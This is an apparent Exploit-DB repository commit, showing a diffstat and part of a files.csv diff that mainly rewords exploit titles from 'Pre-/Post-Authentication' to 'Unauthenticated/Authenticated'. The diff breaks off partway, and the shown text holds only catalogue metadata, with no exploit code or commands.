SEH Overflow Konica Minolta FTP Utility 1.00 - Authenticated CWD Command SEH Overflow GLPI 0.85.5 - Remote Code Execution (via File Upload Filter Bypass) GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution Dream CMS 2.3.0 - Cross-Site Request Forgery Add Extension / Arbitrary File Upload PHP Code Execution Dream CMS 2.3.0 - Cross-Site Request Forgery (Add Extension) / Arbitrary File Upload / PHP Code Execution vBulletin 5.1.x - Pre-Authentication Remote Code Execution vBulletin 5.1.x - Unauthenticated Remote Code Execution WordPress Ninja Forms 2.7.7 Plugin - Authorization Bypass WordPress WP to Twitter Plugin - Authorization Bypass WordPress Ninja Forms 2.7.7 Plugin - Authentication Bypass WordPress WP to Twitter Plugin - Authentication Bypass Novell ServiceDesk - Authenticated File Upload Novell ServiceDesk - Authenticated Arbitrary File Upload Relay Ajax Directory Manager relayb01-071706 / 1.5.1 / 1.5.3 - Unauthenticated File Upload Relay Ajax Directory Manager relayb01-071706 / 1.5.1 / 1.5.3 - Unauthenticated Arbitrary File Upload Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal DEP + ASLR Bypass) Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal ASLR + DEP Bypass) phpATM 1.32 - Remote Command Execution (Arbitrary File Upload) on Windows Servers phpATM 1.32 - Arbitrary File Upload / Remote Command Execution (Windows Servers) vBulletin 5.x/4.x - Post-Authentication Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API vBulletin 4.x - Post-Authentication SQL Injection in breadcrumbs via xmlrpc API vBulletin 5.x/4.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API vBulletin 4.x - Authenticated SQL Injection in breadcrumbs via xmlrpc API Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Post-Authentication Remote Root Exploit (Metasploit) Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Authenticated Remote Root Exploit (Metasploit) Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Post-Authentication Remote Root Exploit (Metasploit) (3) Barracuda Web Application Firewall 8.0.1.008 - Post-Authentication Remote Root Exploit (Metasploit) Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Root Exploit (Metasploit) (3) Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Root Exploit (Metasploit) phpMyAdmin 4.6.2 - Post-Authentication Remote Code Execution phpMyAdmin 4.6.2 - Authenticated Remote Code Execution vBulletin 5.2.2 - Pre-Authentication Server Side Request Forgery (SSRF) vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery (SSRF) ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authorization Bypass ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authentication Bypass --- files.csv | 468 ++++----- platforms/android/remote/40354.txt | 160 +++ platforms/multiple/dos/40355.txt | 32 + platforms/multiple/dos/40356.txt | 21 + platforms/php/webapps/40351.txt | 40 + platforms/php/webapps/40353.py | 56 + platforms/unix/remote/21671.c | 2 + platforms/unix/remote/21672.c | 1303 ------------------------ platforms/unix/remote/40347.txt | 444 ++++++++ platforms/{linux => unix}/remote/764.c | 2 +- platforms/win_x86/shellcode/40352.c | 519 ++++++++++ platforms/windows/local/40341.txt | 242 ----- platforms/windows/local/40348.py | 66 ++ platforms/windows/local/40349.py | 67 ++ platforms/windows/local/40350.py | 99 ++ 15 files changed, 1745 insertions(+), 1776 deletions(-) create mode 100755 platforms/android/remote/40354.txt create mode 100755 platforms/multiple/dos/40355.txt create mode 100755 platforms/multiple/dos/40356.txt create mode 100755 platforms/php/webapps/40351.txt create mode 100755 platforms/php/webapps/40353.py delete mode 100755 platforms/unix/remote/21672.c create mode 100755 platforms/unix/remote/40347.txt rename platforms/{linux => unix}/remote/764.c (95%) create mode 100755 platforms/win_x86/shellcode/40352.c delete mode 100755 platforms/windows/local/40341.txt create mode 100755 platforms/windows/local/40348.py create mode 100755 platforms/windows/local/40349.py create mode 100755 platforms/windows/local/40350.py diff --git a/files.csv b/files.csv index 4c75ea246..650da3f74 100755 --- a/files.csv +++ b/files.csv @@ -338,7 +338,7 @@ id,file,description,date,author,platform,type,port 361,platforms/windows/remote/361.txt,"Flash FTP Server - Directory Traversal",2004-07-22,CoolICE,windows,remote,0 362,platforms/windows/dos/362.sh,"Xitami Web Server - Denial of Service",2004-07-22,CoolICE,windows,dos,0 363,platforms/hardware/dos/363.txt,"Conceptronic CADSLR1 Router - Denial of Service",2004-07-22,"Seth Alan Woolley",hardware,dos,0 -364,platforms/linux/remote/364.pl,"Samba 3.0.4 - SWAT Authorization Buffer Overflow",2004-07-22,"Noam Rathaus",linux,remote,901 +364,platforms/linux/remote/364.pl,"Samba 3.0.4 SWAT - Authorisation Buffer Overflow",2004-07-22,"Noam Rathaus",linux,remote,901 365,platforms/windows/dos/365.html,"Microsoft Internet Explorer - Denial of Service (11 bytes)",2004-07-23,Phuong,windows,dos,0 366,platforms/windows/dos/366.pl,"Microsoft Windows SMS 2.0 - Denial of Service",2004-07-24,MacDefender,windows,dos,0 367,platforms/osx/local/367.txt,"Apple Mac OSX - Panther Internet Connect Privilege Escalation",2004-07-28,B-r00t,osx,local,0 @@ -589,7 +589,7 @@ id,file,description,date,author,platform,type,port 761,platforms/windows/remote/761.cpp,"NodeManager Professional 2.00 - Buffer Overflow",2005-01-18,"Tan Chew Keong",windows,remote,162 762,platforms/osx/dos/762.c,"Apple Mac OSX 10.3.7 - Input Validation Flaw parse_machfile() Denial of Service",2005-01-20,nemo,osx,dos,0 763,platforms/linux/local/763.c,"fkey 0.0.2 - Local File Accessibility Exploit",2005-01-20,vade79,linux,local,79 -764,platforms/linux/remote/764.c,"Apache OpenSSL - 'OpenFuckV2.c' Remote Exploit",2003-04-04,spabam,linux,remote,80 +764,platforms/unix/remote/764.c,"Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuckV2.c' Remote Exploit (2)",2003-04-04,spabam,unix,remote,80 765,platforms/windows/remote/765.c,"Microsoft Internet Explorer - '.ANI' files handling Universal Exploit (MS05-002)",2005-01-22,houseofdabus,windows,remote,0 766,platforms/osx/local/766.c,"Apple Mac OSX 10.3.7 - mRouter Privilege Escalation",2005-01-22,nemo,osx,local,0 767,platforms/windows/remote/767.pl,"Golden FTP Server 2.02b - Remote Buffer Overflow",2005-01-22,Barabas,windows,remote,21 @@ -1050,7 +1050,7 @@ id,file,description,date,author,platform,type,port 1256,platforms/multiple/dos/1256.pl,"Lynx 2.8.6dev.13 - Remote Buffer Overflow (PoC)",2005-10-17,"Ulf Harnhammar",multiple,dos,0 1257,platforms/multiple/dos/1257.html,"Mozilla (Firefox 1.0.7) (Mozilla 1.7.12) - Denial of Service",2005-10-17,Kubbo,multiple,dos,0 1258,platforms/linux/remote/1258.php,"e107 <= 0.6172 - (resetcore.php) SQL Injection",2005-10-18,rgod,linux,remote,0 -1259,platforms/hp-ux/remote/1259.pm,"HP-UX FTP Server - Pre-Authentication Directory Listing Exploit (Metasploit)",2005-10-19,Optyx,hp-ux,remote,0 +1259,platforms/hp-ux/remote/1259.pm,"HP-UX FTP Server - Unauthenticated Directory Listing Exploit (Metasploit)",2005-10-19,Optyx,hp-ux,remote,0 1260,platforms/windows/remote/1260.pm,"Microsoft IIS - SA WebAgent 5.2/5.3 Redirect Overflow (Metasploit)",2005-10-19,"H D Moore",windows,remote,80 1261,platforms/hp-ux/remote/1261.pm,"HP-UX 11.11 - lpd Remote Command Execution (Metasploit)",2005-10-19,"H D Moore",hp-ux,remote,515 1262,platforms/windows/remote/1262.pm,"CA Unicenter 3.1 - CAM log_security() Stack Overflow (Metasploit)",2005-10-19,"H D Moore",windows,remote,4105 @@ -1123,7 +1123,7 @@ id,file,description,date,author,platform,type,port 1346,platforms/windows/dos/1346.c,"Microsoft Windows Metafile - 'mtNoObjects' Denial of Service (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0 1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 (x86) - (phgrafx) Local Buffer Overflow",2005-11-30,"p. minervini",qnx,local,0 1352,platforms/windows/remote/1352.cpp,"Microsoft Windows - DTC Remote Exploit (PoC) (MS05-051) (2)",2005-12-01,Swan,windows,remote,0 -1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple Pre-Authentication Remote Stack Overflow (PoC)",2005-12-02,Sowhat,windows,dos,0 +1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple Unauthenticated Remote Stack Overflow (PoC)",2005-12-02,Sowhat,windows,dos,0 1354,platforms/php/webapps/1354.php,"Zen Cart 1.2.6d - 'password_forgotten.php' SQL Injection",2005-12-02,rgod,php,webapps,0 1355,platforms/linux/remote/1355.pl,"sobexsrv 1.0.0_pre3 Bluetooth - syslog() Remote Format String",2005-12-03,"Kevin Finisterre",linux,remote,0 1356,platforms/php/webapps/1356.php,"DoceboLms 2.0.4 - connector.php Arbitrary File Upload",2005-12-04,rgod,php,webapps,0 @@ -1470,7 +1470,7 @@ id,file,description,date,author,platform,type,port 1751,platforms/php/webapps/1751.php,"Limbo CMS 1.0.4.2 - 'catid' SQL Injection",2006-05-05,[Oo],php,webapps,0 1752,platforms/php/webapps/1752.pl,"StatIt 4 - (statitpath) Remote File Inclusion",2006-05-05,IGNOR3,php,webapps,0 1753,platforms/php/webapps/1753.txt,"TotalCalendar 2.30 - (inc) Remote File Inclusion",2006-05-05,Aesthetico,php,webapps,0 -1754,platforms/windows/dos/1754.py,"FileCOPA FTP Server 1.01 - (USER) Remote Pre-Authentication Denial of Service",2006-05-05,Bigeazer,windows,dos,0 +1754,platforms/windows/dos/1754.py,"FileCOPA FTP Server 1.01 - (USER) Remote Unauthenticated Denial of Service",2006-05-05,Bigeazer,windows,dos,0 1755,platforms/cgi/webapps/1755.py,"AWStats 6.5 - (migrate) Remote Shell Command Injection",2006-05-06,redsand,cgi,webapps,0 1756,platforms/php/webapps/1756.pl,"HiveMail 1.3 - (addressbook.add.php) Remote Code Execution",2006-05-06,[Oo],php,webapps,0 1757,platforms/windows/dos/1757.c,"acFTP FTP Server 1.4 - (USER) Remote Denial of Service",2006-05-06,Omni,windows,dos,0 @@ -2894,7 +2894,6 @@ id,file,description,date,author,platform,type,port 3221,platforms/php/webapps/3221.php,"GuppY 4.5.16 - Remote Commands Execution Exploit",2007-01-29,rgod,php,webapps,0 3222,platforms/php/webapps/3222.txt,"Webfwlog 0.92 - (debug.php) Remote File Disclosure",2007-01-29,GoLd_M,php,webapps,0 3223,platforms/cgi/dos/3223.pl,"CVSTrac 2.0.0 - Defacement Denial of Service",2007-01-29,"Ralf S. Engelschall",cgi,dos,0 -40341,platforms/windows/local/40341.txt,"Multiple Applications - Local Credentials Disclosure",2016-09-07,"Yakir Wizman",windows,local,0 3224,platforms/windows/dos/3224.c,"Intel 2200BG 802.11 - disassociation packet Kernel Memory Corruption",2007-01-29,"Breno Silva Pinto",windows,dos,0 3225,platforms/php/webapps/3225.pl,"Galeria Zdjec 3.0 - (zd_numer.php) Local File Inclusion",2007-01-30,ajann,php,webapps,0 3226,platforms/php/webapps/3226.txt,"PHPFootball 1.6 - (show.php) Remote Database Disclosure",2007-01-30,ajann,php,webapps,0 @@ -3076,7 +3075,7 @@ id,file,description,date,author,platform,type,port 3404,platforms/multiple/dos/3404.php,"PHP - wddx_deserialize() String Append Crash",2007-03-04,"Stefan Esser",multiple,dos,0 3405,platforms/multiple/remote/3405.txt,"PHP 4.4.3 - 4.4.6 PHPinfo() Remote Cross-Site Scripting",2007-03-04,"Stefan Esser",multiple,remote,0 3406,platforms/php/webapps/3406.pl,"News-Letterman 1.1 - (eintrag.php sqllog) Remote File Inclusion",2007-03-04,bd0rk,php,webapps,0 -3407,platforms/multiple/dos/3407.c,"Asterisk 1.2.15 / 1.4.0 - Pre-Authentication Remote Denial of Service",2007-03-04,fbffff,multiple,dos,0 +3407,platforms/multiple/dos/3407.c,"Asterisk 1.2.15 / 1.4.0 - Unauthenticated Remote Denial of Service",2007-03-04,fbffff,multiple,dos,0 3408,platforms/php/webapps/3408.pl,"AJ Auction Pro - 'subcat.php' SQL Injection",2007-03-04,ajann,php,webapps,0 3409,platforms/php/webapps/3409.htm,"AJ Dating 1.0 - (view_profile.php) SQL Injection",2007-03-04,ajann,php,webapps,0 3410,platforms/php/webapps/3410.htm,"AJ Classifieds 1.0 - (postingdetails.php) SQL Injection",2007-03-04,ajann,php,webapps,0 @@ -3279,7 +3278,7 @@ id,file,description,date,author,platform,type,port 3613,platforms/php/webapps/3613.txt,"phpBB MOD Forum picture and META tags 1.7 - Remote File Inclusion",2007-03-30,bd0rk,php,webapps,0 3614,platforms/php/webapps/3614.txt,"JSBoard 2.0.10 - (login.php table) Local File Inclusion",2007-03-30,GoLd_M,php,webapps,0 3615,platforms/linux/remote/3615.c,"dproxy-nexgen (Linux/x86) - Remote Root Buffer Overflow",2007-03-30,mu-b,linux,remote,53 -3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - Pre-Authentication Remote Exploit",2007-03-31,muts,windows,remote,143 +3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - Unauthenticated Remote Exploit",2007-03-31,muts,windows,remote,143 3617,platforms/windows/local/3617.cpp,"Microsoft Windows - Animated Cursor '.ani' Stack Overflow",2007-03-31,devcode,windows,local,0 3618,platforms/php/webapps/3618.htm,"XOOPS Module Lykos Reviews 1.00 - 'index.php' SQL Injection",2007-03-31,ajann,php,webapps,0 3619,platforms/php/webapps/3619.pl,"XOOPS Module Library - 'viewcat.php' SQL Injection",2007-03-31,ajann,php,webapps,0 @@ -3310,7 +3309,7 @@ id,file,description,date,author,platform,type,port 3647,platforms/windows/local/3647.c,"Microsoft Windows - Animated Cursor '.ani' Local Buffer Overflow",2007-04-02,Marsu,windows,local,0 3648,platforms/windows/local/3648.c,"Irfanview 3.99 - '.ani' Local Buffer Overflow (1)",2007-04-02,Marsu,windows,local,0 3649,platforms/windows/local/3649.c,"Ipswitch WS_FTP 5.05 - Server Manager Local Site Buffer Overflow",2007-04-02,Marsu,windows,local,0 -3650,platforms/windows/remote/3650.c,"Frontbase 4.2.7 - Post-Authentication Remote Buffer Overflow (2.2)",2007-04-02,Heretic2,windows,remote,0 +3650,platforms/windows/remote/3650.c,"Frontbase 4.2.7 - Authenticated Remote Buffer Overflow (2.2)",2007-04-02,Heretic2,windows,remote,0 3651,platforms/windows/remote/3651.txt,"Microsoft Windows - Animated Cursor '.ani' Universal Exploit Generator",2007-04-03,"YAG KOHHA",windows,remote,0 3652,platforms/windows/local/3652.c,"Microsoft Windows - Animated Cursor '.ani' Overflow (Hardware DEP)",2007-04-03,devcode,windows,local,0 3653,platforms/php/webapps/3653.php,"MyBulletinBoard (MyBB) 1.2.3 - Remote Code Execution",2007-04-03,DarkFig,php,webapps,0 @@ -3682,7 +3681,7 @@ id,file,description,date,author,platform,type,port 4024,platforms/windows/local/4024.rb,"DVD X Player 4.1 Professional - '.PLF' File Buffer Overflow",2007-06-02,n00b,windows,local,0 4025,platforms/php/webapps/4025.php,"Quick.Cart 2.2 - Remote File Inclusion / Local File Inclusion Remote Code Execution",2007-06-02,Kacper,php,webapps,0 4026,platforms/php/webapps/4026.php,"PNPHPBB2 <= 1.2 - (index.php c) SQL Injection",2007-06-03,Kacper,php,webapps,0 -4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager - Pre-Authentication Remote Exploit",2007-06-03,muts,windows,remote,8080 +4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager - Unauthenticated Remote Exploit",2007-06-03,muts,windows,remote,8080 4028,platforms/linux/local/4028.txt,"Screen 4.0.3 (OpenBSD) - Local Authentication Bypass",2008-06-18,Rembrandt,linux,local,0 4029,platforms/php/webapps/4029.php,"Sendcard 3.4.1 - (Local File Inclusion) Remote Code Execution",2007-06-04,Silentz,php,webapps,0 4030,platforms/php/webapps/4030.php,"EQdkp 1.3.2 - (listmembers.php rank) SQL Injection",2007-06-04,Silentz,php,webapps,0 @@ -3943,14 +3942,14 @@ id,file,description,date,author,platform,type,port 4291,platforms/php/webapps/4291.txt,"GetMyOwnArcade - 'search.php query' SQL Injection",2007-08-16,RoXur777,php,webapps,0 4292,platforms/windows/remote/4292.cpp,"Diskeeper 9 - Remote Memory Disclosure",2007-08-17,Pravus,windows,remote,0 4293,platforms/windows/dos/4293.php,"PHP 5.2.0 (Windows/x86) - (PHP_win32sti) Local Buffer Overflow (PoC)",2007-08-18,boecke,windows,dos,0 -4294,platforms/windows/dos/4294.pl,"Mercury SMTPD - Remote Pre-Authentication Stack Based Overrun (PoC)",2007-08-18,eliteboy,windows,dos,0 +4294,platforms/windows/dos/4294.pl,"Mercury SMTPD - Remote Unauthenticated Stack Based Overrun (PoC)",2007-08-18,eliteboy,windows,dos,0 4295,platforms/php/webapps/4295.txt,"Squirrelcart 1.x.x - (cart.php) Remote File Inclusion",2007-08-19,ShaiMagal,php,webapps,0 4296,platforms/php/webapps/4296.txt,"Mambo Component SimpleFAQ 2.11 - SQL Injection",2007-08-20,k1tk4t,php,webapps,0 4297,platforms/hardware/dos/4297.pl,"Cisco IP Phone 7940 - (3 SIP Messages) Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0 4298,platforms/hardware/dos/4298.pl,"Cisco IP Phone 7940 - (10 SIP Messages) Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0 4299,platforms/windows/remote/4299.html,"eCentrex VOIP Client module - (uacomx.ocx 2.0.1) Remote Buffer Overflow",2007-08-21,rgod,windows,remote,0 4300,platforms/php/webapps/4300.txt,"litecommerce 2004 - (category_id) SQL Injection",2007-08-21,k1tk4t,php,webapps,0 -4301,platforms/windows/remote/4301.cpp,"Mercury/32 4.51 - SMTPD CRAM-MD5 Pre-Authentication Remote Overflow",2007-08-22,ZhenHan.Liu,windows,remote,25 +4301,platforms/windows/remote/4301.cpp,"Mercury/32 4.51 - SMTPD CRAM-MD5 Unauthenticated Remote Overflow",2007-08-22,ZhenHan.Liu,windows,remote,25 4302,platforms/windows/local/4302.php,"PHP 5.2.3 - (PHP_win32sti) Local Buffer Overflow (1)",2007-08-22,Inphex,windows,local,0 4303,platforms/windows/local/4303.php,"PHP 5.2.3 - (PHP_win32sti) Local Buffer Overflow (2)",2007-08-22,NetJackal,windows,local,0 4304,platforms/windows/dos/4304.php,"PHP 5.2.3 - PHP_ntuser ntuser_getuserlist() Local Buffer Overflow (PoC)",2007-08-23,shinnai,windows,dos,0 @@ -3964,8 +3963,8 @@ id,file,description,date,author,platform,type,port 4312,platforms/linux/remote/4312.c,"ProFTPd 1.x (module mod_tls) - Remote Buffer Overflow",2007-08-24,netris,linux,remote,21 4313,platforms/php/webapps/4313.pl,"SunShop 4.0 RC 6 - 'Search' Blind SQL Injection",2007-08-25,k1tk4t,php,webapps,0 4314,platforms/windows/local/4314.php,"PHP Perl Extension - Safe_mode BypassExploit",2007-08-25,NetJackal,windows,local,0 -4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server - Pre-Authentication Remote Buffer Overflow",2007-08-25,"Joxean Koret",linux,remote,389 -4316,platforms/windows/remote/4316.cpp,"Mercury/32 3.32-4.51 - SMTP Pre-Authentication EIP Overwrite",2007-08-26,Heretic2,windows,remote,25 +4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server - Unauthenticated Remote Buffer Overflow",2007-08-25,"Joxean Koret",linux,remote,389 +4316,platforms/windows/remote/4316.cpp,"Mercury/32 3.32-4.51 - SMTP Unauthenticated EIP Overwrite",2007-08-26,Heretic2,windows,remote,25 4317,platforms/php/webapps/4317.txt,"2532/Gigs 1.2.1 - (activateuser.php) Local File Inclusion",2007-08-26,bd0rk,php,webapps,0 4318,platforms/windows/dos/4318.php,"PHP 5.2.0 (Windows/x86) - (PHP_iisfunc.dll) Local Buffer Overflow (PoC)",2007-08-27,boecke,windows,dos,0 4319,platforms/hardware/dos/4319.pl,"Thomson SIP phone ST 2030 - Remote Denial of Service",2007-08-27,MADYNES,hardware,dos,0 @@ -3993,7 +3992,7 @@ id,file,description,date,author,platform,type,port 4341,platforms/php/webapps/4341.txt,"Pakupaku CMS 0.4 - Arbitrary File Upload / Local File Inclusion",2007-08-29,GoLd_M,php,webapps,0 4342,platforms/php/webapps/4342.txt,"NMDeluxe 2.0.0 - 'id' SQL Injection",2007-08-30,"not sec group",php,webapps,0 4343,platforms/cgi/webapps/4343.txt,"Ourspace 2.0.9 - (uploadmedia.cgi) Arbitrary File Upload",2007-08-30,Don,cgi,webapps,0 -4344,platforms/windows/dos/4344.php,"Hexamail Server 3.0.0.001 - (pop3) Pre-Authentication Remote Overflow (PoC)",2007-08-30,rgod,windows,dos,0 +4344,platforms/windows/dos/4344.php,"Hexamail Server 3.0.0.001 - (pop3) Unauthenticated Remote Overflow (PoC)",2007-08-30,rgod,windows,dos,0 4345,platforms/windows/local/4345.c,"Norman Virus Control - nvcoaft51.sys ioctl BF672028 Exploit",2007-08-30,inocraM,windows,local,0 4346,platforms/php/webapps/4346.pl,"phpBB Links MOD 1.2.2 - SQL Injection",2007-08-31,Don,php,webapps,0 4347,platforms/linux/dos/4347.pl,"Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop Exploit",2007-08-31,"Beyond Security",linux,dos,0 @@ -4074,10 +4073,10 @@ id,file,description,date,author,platform,type,port 4423,platforms/php/webapps/4423.txt,"modifyform - 'modifyform.html' Remote File Inclusion",2007-09-18,mozi,php,webapps,0 4424,platforms/windows/remote/4424.html,"Apple QuickTime /w IE .qtl Version XAS - Remote Exploit (PoC)",2007-09-18,"Aviv Raff",windows,remote,0 4425,platforms/php/webapps/4425.pl,"phpBB Mod Ktauber.com StylesDemo - Blind SQL Injection",2007-09-18,nexen,php,webapps,0 -4426,platforms/hardware/dos/4426.pl,"Airsensor M520 - HTTPD Remote Pre-Authentication Denial of Service / Buffer Overflow (PoC)",2007-09-18,"Alex Hernandez",hardware,dos,0 +4426,platforms/hardware/dos/4426.pl,"Airsensor M520 - HTTPD Remote Unauthenticated Denial of Service / Buffer Overflow (PoC)",2007-09-18,"Alex Hernandez",hardware,dos,0 4427,platforms/windows/remote/4427.html,"jetAudio 7.x - ActiveX DownloadFromMusicStore() Code Execution",2007-09-19,h07,windows,remote,0 4428,platforms/windows/remote/4428.html,"Yahoo! Messenger 8.1.0.421 - CYFT Object Arbitrary File Download",2007-09-19,shinnai,windows,remote,0 -4429,platforms/windows/remote/4429.pl,"Mercury/32 4.52 IMAPD - SEARCH command Post-Authentication Overflow",2007-09-19,void,windows,remote,143 +4429,platforms/windows/remote/4429.pl,"Mercury/32 4.52 IMAPD - SEARCH command Authenticated Overflow",2007-09-19,void,windows,remote,143 4430,platforms/php/webapps/4430.txt,"Streamline PHP Media Server 1.0-beta4 - Remote File Inclusion",2007-09-19,BiNgZa,php,webapps,0 4431,platforms/windows/local/4431.py,"Microsoft Visual Basic Enterprise Edition 6.0 SP6 - Code Execution",2007-09-19,shinnai,windows,local,0 4432,platforms/multiple/dos/4432.html,"Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow (PoC)",2007-09-19,"YAG KOHHA",multiple,dos,0 @@ -4521,8 +4520,8 @@ id,file,description,date,author,platform,type,port 4873,platforms/windows/remote/4873.html,"Microsoft FoxServer - (vfp6r.dll 6.0.8862.0) ActiveX Command Execution",2008-01-09,shinnai,windows,remote,0 4874,platforms/windows/remote/4874.html,"Microsoft Rich Textbox Control 6.0 - (SP6) SaveFile() Insecure Method",2008-01-09,shinnai,windows,remote,0 4876,platforms/php/webapps/4876.txt,"Tuned Studios Templates - Local File Inclusion",2008-01-09,DSecRG,php,webapps,0 -4877,platforms/multiple/remote/4877.txt,"SAP MaxDB 7.6.03.07 - Pre-Authentication Remote Command Execution",2008-01-09,"Luigi Auriemma",multiple,remote,7210 -4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server - Remote Pre-Authentication Code Execution / Denial of Service (PoC)",2008-01-09,"Leon Juranic",multiple,dos,0 +4877,platforms/multiple/remote/4877.txt,"SAP MaxDB 7.6.03.07 - Unauthenticated Remote Command Execution",2008-01-09,"Luigi Auriemma",multiple,remote,7210 +4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server - Remote Unauthenticated Code Execution / Denial of Service (PoC)",2008-01-09,"Leon Juranic",multiple,dos,0 4879,platforms/php/webapps/4879.php,"Docebo 3.5.0.3 - (lib.regset.php) Command Execution",2008-01-09,EgiX,php,webapps,0 4880,platforms/php/webapps/4880.php,"DomPHP 0.81 - Remote Add Administrator Exploit",2008-01-10,j0j0,php,webapps,0 4881,platforms/solaris/dos/4881.c,"SunOS 5.10 - Remote ICMP Kernel Crash",2008-01-10,kingcope,solaris,dos,0 @@ -4889,7 +4888,7 @@ id,file,description,date,author,platform,type,port 5246,platforms/php/webapps/5246.txt,"EasyCalendar 4.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0 5247,platforms/php/webapps/5247.txt,"easygallery 5.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0 5248,platforms/windows/remote/5248.py,"MDaemon IMAP server 9.6.4 - (FETCH) Remote Buffer Overflow",2008-03-13,ryujin,windows,remote,143 -5249,platforms/windows/remote/5249.pl,"MailEnable Pro/Ent 3.13 - (Fetch) Post-Authentication Remote Buffer Overflow",2008-03-14,haluznik,windows,remote,0 +5249,platforms/windows/remote/5249.pl,"MailEnable Pro/Ent 3.13 - (Fetch) Authenticated Remote Buffer Overflow",2008-03-14,haluznik,windows,remote,0 5250,platforms/windows/local/5250.cpp,"VLC 0.8.6e - Subtitle Parsing Local Buffer Overflow",2008-03-14,"Mai Xuan Cuong",windows,local,0 5252,platforms/php/webapps/5252.txt,"eXV2 Module MyAnnonces - (lid) SQL Injection",2008-03-14,S@BUN,php,webapps,0 5253,platforms/php/webapps/5253.txt,"eXV2 Module eblog 1.2 - (blog_id) SQL Injection",2008-03-14,S@BUN,php,webapps,0 @@ -4898,7 +4897,7 @@ id,file,description,date,author,platform,type,port 5256,platforms/php/webapps/5256.pl,"AuraCMS 2.2.1 - (online.php) Blind SQL Injection",2008-03-14,NTOS-Team,php,webapps,0 5257,platforms/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure",2008-03-14,kingcope,multiple,remote,0 5258,platforms/solaris/dos/5258.c,"SunOS 5.10 Sun Cluster - rpc.metad Denial of Service (PoC)",2008-03-14,kingcope,solaris,dos,0 -5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP Post-Authentication Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143 +5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP Authenticated Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143 5260,platforms/php/webapps/5260.txt,"Fuzzylime CMS 3.01 - (admindir) Remote File Inclusion",2008-03-14,irk4z,php,webapps,0 5261,platforms/windows/dos/5261.py,"Rosoft Media Player 4.1.8 - RML Stack Based Buffer Overflow (PoC)",2008-03-15,"Wiktor Sierocinski",windows,dos,0 5262,platforms/php/webapps/5262.txt,"mutiple timesheets 5.0 - Multiple Vulnerabilities",2008-03-16,JosS,php,webapps,0 @@ -4978,7 +4977,7 @@ id,file,description,date,author,platform,type,port 5339,platforms/php/webapps/5339.php,"Nuked-klaN 1.7.6 - Multiple Vulnerabilities",2008-04-01,"Charles Fol",php,webapps,0 5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 - SQL Injection",2008-04-01,DreamTurk,php,webapps,0 5341,platforms/windows/dos/5341.pl,"Noticeware Email Server 4.6.1.0 - Denial of Service",2008-04-01,Ray,windows,dos,0 -5342,platforms/windows/remote/5342.py,"HP OpenView NNM 7.5.1 - OVAS.exe SEH Pre-Authentication Overflow",2008-04-02,muts,windows,remote,7510 +5342,platforms/windows/remote/5342.py,"HP OpenView NNM 7.5.1 - OVAS.exe SEH Unauthenticated Overflow",2008-04-02,muts,windows,remote,7510 5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service",2008-04-02,muts,windows,dos,0 5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP - Denial of Service",2008-04-02,muts,windows,dos,0 5345,platforms/php/webapps/5345.txt,"Joomla Component OnlineFlashQuiz 1.0.2 - Remote File Inclusion",2008-04-02,NoGe,php,webapps,0 @@ -5086,7 +5085,7 @@ id,file,description,date,author,platform,type,port 5448,platforms/php/webapps/5448.txt,"Koobi Pro 6.25 - poll SQL Injection",2008-04-14,S@BUN,php,webapps,0 5449,platforms/php/webapps/5449.php,"KwsPHP - (Upload) Remote Code Execution",2008-04-14,Ajax,php,webapps,0 5450,platforms/php/webapps/5450.txt,"Classifieds Caffe - 'index.php cat_id' SQL Injection",2008-04-15,JosS,php,webapps,0 -5451,platforms/windows/remote/5451.py,"BigAnt Server 2.2 - Pre-Authentication Remote SEH Overflow",2008-04-15,ryujin,windows,remote,6080 +5451,platforms/windows/remote/5451.py,"BigAnt Server 2.2 - Unauthenticated Remote SEH Overflow",2008-04-15,ryujin,windows,remote,6080 5452,platforms/php/webapps/5452.txt,"lightneasy sqlite / no database 1.2.2 - Multiple Vulnerabilities",2008-04-15,girex,php,webapps,0 5453,platforms/windows/dos/5453.pl,"DivX Player 6.7.0 - '.srt' File Buffer Overflow (PoC)",2008-04-15,securfrog,windows,dos,0 5454,platforms/php/webapps/5454.txt,"Lasernet CMS 1.5 - SQL Injection (2)",2008-04-15,cO2,php,webapps,0 @@ 